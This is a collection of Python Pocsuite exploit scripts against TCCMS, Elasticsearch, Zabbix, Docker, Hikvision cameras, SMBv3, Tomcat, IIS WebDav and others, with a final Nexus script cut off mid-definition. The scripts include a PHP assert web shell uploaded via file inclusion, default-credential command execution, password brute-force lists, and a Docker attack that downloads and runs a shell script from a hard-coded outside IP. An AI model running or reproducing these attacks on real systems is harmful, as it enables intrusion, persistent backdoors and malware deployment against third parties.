#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.lib.core.data import logger
from pocsuite.lib.core.enums import CUSTOM_LOGGING
import urlparse
import re


class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['Gump']
    vulDate = '2015-06-30'
    createDate = '2016-01-24'
    updateDate = '2016-01-24'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0104065']
    name = 'TCCMS V9 本地文件包含 POC'
    appPowerLink = 'http://www.teamcen.com/'
    appName = 'TCCMS'
    appVersion = 'V9'
    vulType = 'Local File Inclusion'
    desc = '''
    TCCMS在system/core/controller.class.php中对参数过滤不严导致本地文件包含
    '''
    samples = ['']
    # 组件下载地址：http://down.chinaz.com/soft/33822.htm
    
    # 需要登录后的cookie
    def check_argv(self):
        logger.log(CUSTOM_LOGGING.WARNING,u"注意，需要登录后的cookie")
        if self.headers['Cookie']:
            logger.log(CUSTOM_LOGGING.WARNING,u"请务必确保cookie正确")
            return True
        else:
            logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie")
            return False
            
    
    def _attack(self):
        if self.check_argv():
            result = {}

            self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
            post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
            # 上传shell
            post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
            resp = req.post(url=post_url,data=post_data)

            # 从返回的内容中提取上传图片的文件名
            if resp.status_code == 200:
                match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
                if match_result:
                    # 访问本地文件包含地址
                    payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                    vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
                    resp = req.get(vul_url)
                    if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
                        result['ShellInfo'] = {}
                        result['ShellInfo']['URL'] = vul_url
                        result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
            return self.parse_attack(result)

        return self._verify()

    def _verify(self):
        if self.check_argv():
            result = {}

            # 设置header里的Content-Type，表明需要上传文件
            self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
            # 文件名为testjpg.jpg，内容为<?php echo md5(0x2333333);unlink(__FILE__); ?>
            post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
            # 上传地址，这个是正常功能
            post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
            resp = req.post(url=post_url,data=post_data)

            # 从返回的内容中提取上传图片的文件名
            if resp.status_code == 200:
                match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
                if match_result:
                    # 访问本地文件包含地址
                    payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                    vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
                    resp = req.get(vul_url)
                    if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = vul_url
            return self.parse_attack(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
import requests

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
 
class ElasticsearchPOC(POCBase):
    vulID = '22'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-02-21' #漏洞公开的时间,不知道就写今天
 
    author = 'b0b@c' #  PoC作者的大名
    createDate = '2017-12-11'# 编写 PoC 的日期
    updateDate = '2017-12-11'# PoC 更新的时间,默认和编写时间一样
    references = 'http://blog.csdn.net/u011066706/article/details/51175761'# 漏洞地址来源,0day不用写
    name = 'Elasticsearch Unauthorized Access'# PoC 名称
    appPowerLink = 'https://www.elastic.co/products/elasticsearch'# 漏洞厂商主页地址
    appName = 'Elasticsearch'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'weak-pass'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Elasticsearch未授权访问漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危" #严重,高危,中危,低危

    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
 
        #如果设置端口则取端口,没有设置则为默认端口
        import re
        import socket 
        socket.setdefaulttimeout(2)
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = 9200
 
        payload = 'http://%s:%s/'%(_host,_port)
        
        #检测漏洞
        try:
            response = requests.get(payload,timeout=2)
            if response.status_code == 200:
                if response.content.find("You Know, for Search") >= 0:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = _host
                    result['VerifyInfo']['Payload'] = payload
            # else:
            #     response = requests.get(payload.replace("9200","9207"),timeout=2)
            #     print reponse.status_code
            #     if response.status_code == 200:
            #         print "check content"
            #         if response.content.find("order") >= 0:
            #             result['VerifyInfo'] = {}
            #             result['VerifyInfo']['URL'] = _host
            #             result['VerifyInfo']['Payload'] = payload
        except Exception as ex:
            print(str(ex))
        print('[+]22 poc done')
        return self.save_output(result)
 
    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()
 
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output
 
register(ElasticsearchPOC)
"""
漏洞验证：
pip install pocsuite
pocsuite -r Elasticsearch-Unauthorized-Access-Poc.py -u 1.1.1.1 --verify
"""



#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import json

class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['s0m30ne']
    vulDate = ''
    createDate = '2016-06-15'
    updateDate = '2016-06-15'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = 'Zabbix 2.2 - 3.0.3 远程命令执行'
    appPowerLink = 'http://www.zabbix.com/download.php'
    appName = 'Zabbix'
    appVersion = '2.2 - 3.0.3'
    vulType = '远程命令执行'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):

        return self._verify()

    def _verify(self):
        result = {}
        if self.login():
            cmd = 'whoami'
            hostid = '10084'

            payload = {
                "jsonrpc": "2.0",
                "method": "script.update",
                "params": {
                    "scriptid": "1",
                    "command": ""+cmd+""
                },
                "auth" : self.auth['result'],
                "id" : 0,
            }

            headers = {
                'content-type': 'application/json',
            }
         
            cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers)

            payload = {
                "jsonrpc": "2.0",
                "method": "script.execute",
                "params": {
                    "scriptid": "1",
                    "hostid": hostid
                },
                "auth" : self.auth['result'],
                "id" : 0,
            }

            cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers)
            cmd_exe = cmd_exe.json()
            if cmd_exe["result"]["response"] == 'success':
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Url'] = self.url
                result['VerifyInfo']['Cmd'] = cmd
                result['VerifyInfo']['Value'] = cmd_exe['result']['value']

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

    def login(self):
        if self.params:
            user_info = eval(self.params)
            uname = user_info['username']
            passwd = user_info['password']
        else:
            uname = 'Admin'
            passwd = 'zabbix'

        payload = {
            "jsonrpc" : "2.0",
            "method" : "user.login",
            "params": {
                'user': uname,
                'password': passwd,
            },
            "auth" : None,
            "id" : 0,
        }
        headers = {
            'content-type': 'application/json',
        }
        try:
            auth  = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers))
            self.auth = auth.json()
            return True
        except:
            return False

register(TestPOC)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-


from cvpoc.easypoc.data import CONF
from requests.models import Request
from requests.sessions import Session
from requests.sessions import merge_setting, merge_cookies
from requests.cookies import RequestsCookieJar
from requests.utils import get_encodings_from_content
from urllib3 import disable_warnings


def session_request(self, method, url,
                    params=None, data=None, headers=None, cookies=None, files=None, auth=None,
                    timeout=None,
                    allow_redirects=True, proxies=None, hooks=None, stream=None, verify=False, cert=None, json=None):
    # Create the Request.
    conf = CONF.get("requests", {})
    if timeout is None and "timeout" in conf:
        timeout = conf["timeout"]
    merged_cookies = merge_cookies(merge_cookies(RequestsCookieJar(), self.cookies),
                                   cookies or (conf.cookie if 'cookie' in conf else None))

    req = Request(
        method=method.upper(),
        url=url,
        headers=merge_setting(headers, conf["headers"] if 'headers' in conf else {}),
        files=files,
        data=data or {},
        json=json,
        params=params or {},
        auth=auth,
        cookies=merged_cookies,
        hooks=hooks,
    )
    prep = self.prepare_request(req)

    proxies = proxies or (conf["proxies"] if 'proxies' in conf else {})

    settings = self.merge_environment_settings(
        prep.url, proxies, stream, verify, cert
    )

    # Send the request.
    send_kwargs = {
        'timeout': timeout,
        'allow_redirects': allow_redirects,
    }
    send_kwargs.update(settings)
    resp = self.send(prep, **send_kwargs)

    if resp.encoding == 'ISO-8859-1':
        encodings = get_encodings_from_content(resp.text)
        if encodings:
            encoding = encodings[0]
        else:
            encoding = resp.apparent_encoding

        resp.encoding = encoding

    return resp


def patch_session():
    Session.request = session_request


def _disable_warnings():
    """
    Helper for quickly disabling all urllib3 warnings.
    """
    disable_warnings()



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import os

class TestPOC(POCBase):
    vulID = '0'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = '2015-10-30'
    createDate = '2015-10-30'
    updateDate = '2015-10-30'
    references = ['https://www.seebug.org/vuldb/ssvid-89696']
    name = 'Docker Remote API 未授权访问'
    appPowerLink = 'www.seebug.org'
    appName = 'Docker'
    appVersion = 'Docker'
    vulType = 'Abuse of Functionality'
    desc = '''docker 在使用集群管理(如:Kubernetes,swarm)时，要使用remote api对节点进行管理.remote api无认证时的默认端口是2375(需要TLS认证默认登录是2376)。 remote api默认是可以不需要认证能直接访问，能直接对docker进行操作,如新建容器,删除容器,查看镜像容器信息等...
    '''
    samples = ['']

    def _attack(self):
        result = {}
        ret =  os.system("Docker -H tcp://%s:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c 'wget http://149.28.93.152/bins.sh' -O bins.sh;chmod 777 bins.sh;sleep 2s;sh bins.sh;sleep 5s;rm bins.sh")
        if ret == 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Postdata'] = "success"
        return self.parse_output(result)

    def _verify(self):
        result = {}
        target = "%s:2375/info" %self.url
        res = req.get(target)
        if res:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            result['VerifyInfo']['Postdata'] = res.content
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class interact_Remote_File_Include(POCBase):
    vulID = '63658'
    version = '1'
    vulDate = '2006-08-19'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63658']
    name = 'interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability'
    appPowerLink = 'https://sourceforge.net/projects/cce-interact/'
    appName = 'interact'
    appVersion = '<= 2.2'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(interact_Remote_File_Include)


#!/usr/bin/python
# -*- coding: utf-8 -*-
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


def check(uri):
    headers = {
        'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    timeout = 5
    url = '{}/doc/page/main.asp'.format(uri)
    cookies = {'userInfo80': 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='}
    try:
        r = req.get(url, headers=headers, cookies=cookies, timeout=timeout)
        if b'playback.asp' in r.content and b'<div id="mainFrame">' in r.content:
            return True, url
        else:
            return False, 'No server page find'
    except req.exceptions.ConnectionError:
        return False, 'ConnectionError'
    except req.exceptions.ReadTimeout:
        return False, 'ReadTimeout'
    except Exception as e:
        # raise
        return False, str(e)


class TestPOC(POCBase):
    name = 'Hikonvision camara Anonymous User Authentication Bypass'
    vulID = '0'
    author = ['hancool']
    vulType = VUL_TYPE.LOGIN_BYPASS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    version = '1.0'    # default version: 1.0
    references = ['']
    desc = '''Hikonvision camara Anonymous User Authentication Bypass
           CVE-2013-4976'''
    vulDate = '2013-07-29'
    createDate = '2018-12-21'
    updateDate = '2018-12-21'
    appName = 'Hikonvision web'
    appVersion = 'All'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [80]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = check(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                break
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



# -*- encoding:utf-8 -*-
import socket
import struct
import sys

from netaddr import IPNetwork
# from pocsuite.api.poc import POCBase, Output, registe
from pocsuite3.api import POCBase, Output, register_poc as register


class DemoPOC(POCBase):
    vulID = 'ssvid-98183'  # https://www.seebug.org/vuldb/ssvid-98183
    version = '1'
    author = ['qrx']
    vulDate = '2020-03-12'
    createDate = '2020-03-13'
    updateDate = '2020-03-13'
    references = ['https://github.com/ollypwn/SMBGhost']
    name = 'CVE-2020-0796——SMBv3 RCE'
    appPowerLink = 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005'
    appName = 'CVE-2020-0796'
    appVersion = '+ Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + ' \
                 'Windows 10 Version 1903 for x64-based Systems + Windows 10 Version 1909 for 32-bit Systems + ' \
                 'Windows 10 Version 1909 for ARM64-based Systems + Windows 10 Version 1909 for x64-based Systems + ' \
                 'Windows Server, version 1903 (Server Core installation) + Windows Server, version 1909 (Server Core ' \
                 'installation) '
    vulType = 'Command Execution'
    desc = '''Microsoft is aware of a remote code execution vulnerability in the way that the Microsoft Server 
    Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the 
    vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the 
    vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a 
    targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need 
    to configure a malicious SMBv3 Server and convince a user to connect to it. '''
    samples = []
    install_requires = ['struct', 'socket']

    def _verify(self):
        pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        subnet = sys.argv[4]
        result = {}
        for ip in IPNetwork(subnet):

            sock = socket.socket(socket.AF_INET)
            sock.settimeout(3)

            try:
                sock.connect((str(ip), 445))
            except:
                sock.close()
                continue
            sock.send(pkt)
            nb, = struct.unpack(">I", sock.recv(4))
            res = sock.recv(nb)

            if not (res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00"):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.target
                result['VerifyInfo']['payload'] = 123

            return self.parse_output(result)

    def _attack(self):
        return self._verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register(DemoPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip

#基础基类
#pg数据库
class TomcatPOC(POCBase):
    vulID = '34'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-05-17' #漏洞公开的时间,不知道就写今天

    author = 'xiaohuihui1' #  PoC作者的大名
    createDate ='2018-05-17'# 编写 PoC 的日期
    updateDate = '2018-05-17'# PoC 更新的时间,默认和编写时间一样
    references = ['https://bbs.ichunqiu.com/thread-15983-1-1.html']# 漏洞地址来源,0day不用写
    name = 'tomcat weakpass'# PoC 名称
    appPowerLink = 'https://tomcat.apache.org/'# 漏洞厂商主页地址
    appName = 'tomcat weakpass'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'weak pass'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        tomcat weakpass
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = ['base64'] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
        
    #验证模块
    def _verify(self):

        result={}
        output = Output(self)

        port=""

        vul_url = '%s' % self.url

        password = ['123456', 'admin', 'root', 'password', '123123', '123', '1', '',
                    'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
                    '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
                    '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
                    '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
                    'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin']

        user = ["root","admin", "tomcat", "Tomcat", "test", "manager"]


        list_a = [8080, 8090,9080,9090,80] #tomcat常见端口列表
        for one_port in list_a:
            try:
                is_tomcat_url =(vul_url+":"+str(one_port)).strip("/").strip("/").strip(":")

                #"/manager/html").replace('//mana','/')

                reponse = req.get(is_tomcat_url,timeout=3)
                if ("installed Tomcat. Congratulations!" in reponse.text):

                    port = str(one_port)

                    vul_url = is_tomcat_url

                    break
                else:
                    print("not:"+str(one_port))

            except Exception as e:
                pass

        if (port == ""):
            return self.save_output(result)

        #确定port和vul_url了
        vul_url = vul_url+"/manager/html"
        #http://1.1.1.1:9080:9080/manager/html


        import base64
        #import time
        for u in user:
            for p in password:
                try:
                    #time.sleep(2)
                    header = {
                        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0",
                        "Authorization": " Basic " + base64.b64encode(("%s:%s") % (u, p))}


                    reponse = req.get(vul_url , timeout=5, headers=header)
                    if ("Tomcat Web Application Manager" in reponse.text):
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = vul_url
                        result['VerifyInfo']['Payload'] = u + ":" + p
                except Exception as e:
                    pass
        print('[+]34 poc done')
        return self.save_output(result)






    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(TomcatPOC)



#!/usr/bin/env python
#coding=utf-8
import base64
from threading import Thread
import socket
# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip
#from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class HTTP_POC(POCBase):
    vulID = 'HTTP-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'HTTP'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-29'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-29'  # 编写 PoC 的日期
    updateDate = '2020-04-30'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://katyusha.net/557.html']  # 漏洞地址来源,0day不用写
    name = 'HTTP未授权访问漏洞'  # PoC 名称
    cvss = u"低危"


    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        # 传入True参数，得到host和port，参考：https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
        host, port = url2ip(target_url, True)  

        IP_cn = "https://ip.cn"

        # 将http和https的代理都设置为疑似存在
        proxies = {'http': vul_url, 'https': vul_url}

        # 包含了空用户名/空密码的情况。这时候任何用户名密码都可以登录成功
        usernames = ['admin', 'test', '']
        passwords = ['123456', 'admin', 'root', 'password', '123123', '123', '1', '',
                    'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
                    '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
                    '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
                    '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
                    'p@ssw0rd!', 'password1', 'r00t', 'system', '111111']

        try:
            self.flag = False  # 初始化

            threads = []

            for username in usernames:
                for password in passwords:
                    _thread = Thread(target=self.validate, args=(host, port, username, password))
                    _thread.start()
                    threads.append(_thread)

            # 等待所有线程完成
            for t in threads:
                t.join()


            # 状态码为200，则认证已通过HTTP访问目标站点成功
            if self.flag:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)
            return self.save_output(result)
        except Exception as e:
            print(e)

        
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        return self._verify()


    def auth(self, p_user, p_pass):
        tmp = p_user + ':' + p_pass
        auth = base64.b64encode(tmp.encode('ascii')).decode("utf-8")
        headers = 'Proxy-Authorization: Basic'+' '+auth
        return headers



    def validate(self, host, port, username, password):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        socket.setdefaulttimeout(5)
        s.connect((host,port))

        header1 = "GET http://baidu.com/ HTTP/1.1\r\n"
        #auth = "Proxy-Authorization: Basic YWRtaW46YWRtaW4="
        auth = self.auth(username, password)
        payload = header1 + auth + "\r\n\r\n"
        #print(payload)
        s.send(payload.encode())

        data=s.recv(1024)

        data = data.decode("utf-8")
        #print(data[9:12])   # HTTP状态码
        if data[9] == '2':  # 响应2开头的状态码
            print("Success")
            self.flag = True
            return
        elif data[9] == '4':
            #print("Fail")
            pass


    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(HTTP_POC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import Output
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from collections import OrderedDict
from pocsuite3.api import OptString, logger
import socket

class IISWebDav(POCBase):
    vulID = '92834'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2017-03-28'
    createDate = '2019-10-17'
    updateDate = '2019-10-17'
    references = ['https://www.seebug.org/vuldb/ssvid-92834']
    name = 'IIS 6.0 WebDav Remote Code Execution (CVE-2017-7269)'
    appPowerLink = 'https://www.iis.net/'
    appName = 'IIS 6.0'
    appVersion = '6.0'
    vulType = 'rce'
    desc = '''
    IIS 6.0 WebDav Remote Code Execution (CVE-2017-7269)
    '''

    def _options(self):
        o = OrderedDict()
        o['port'] = OptString('', description='这个poc需要输入端口号', require=True)
        return o

    def _verify(self):
        result = {}
        try:
            socket.setdefaulttimeout(10)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ip = self.url.split('//')[1]
            port = int(self.get_option('port'))
            s.connect((ip, port))
            flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % (ip, port)
            s.send(flag.encode())
            data = s.recv(1024)
            s.close()
            if b'PUT' in data:
                url = 'http://' + ip + ":" + str(port) + '/vultest.txt'
                res_html = requests.get(url, timeout=5).text
                if 'big04dream' in res_html:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = flag
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not webdav vulnerability')
        return output

register_poc(IISWebDav)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests


class Nexus(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2020-04-02'
    createDate = '2020-04-02'
    updateDate = '2020-06-30'
    references = ['']
    name = 'Nexus 3 任意修改admin密码越权漏洞'
    appPowerLink = 'https://oss.sonatype.org/'
    appName = 'Nexus 3'
    appVersion = 'Nexus 3'
    vulType = 'unauthorized'
    desc = '''
    Nexus 3 任意修改admin密码越权漏洞（cve-2020-11444）
    '''

    def _options(self):
        o = OrderedDict()
